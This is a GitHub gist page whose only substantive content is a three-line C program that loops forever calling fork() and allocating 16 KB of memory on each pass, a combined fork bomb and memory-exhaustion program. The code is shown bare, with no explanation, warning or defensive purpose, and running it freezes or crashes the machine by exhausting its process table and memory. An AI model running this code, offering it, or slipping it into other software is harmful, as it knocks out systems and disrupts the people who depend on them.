Skip to content

Instantly share code, notes, and snippets.

@Sam-Belliveau
Created May 24, 2019 03:00
Show Gist options
  • Select an option

  • Save Sam-Belliveau/07dd3a3c136c61a6d82fae7c9ecb0ac7 to your computer and use it in GitHub Desktop.

Select an option

Save Sam-Belliveau/07dd3a3c136c61a6d82fae7c9ecb0ac7 to your computer and use it in GitHub Desktop.
#include <unistd.h>
#include <malloc.h>
int main(){for(;;){fork();void *p=malloc(0x4000);}}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment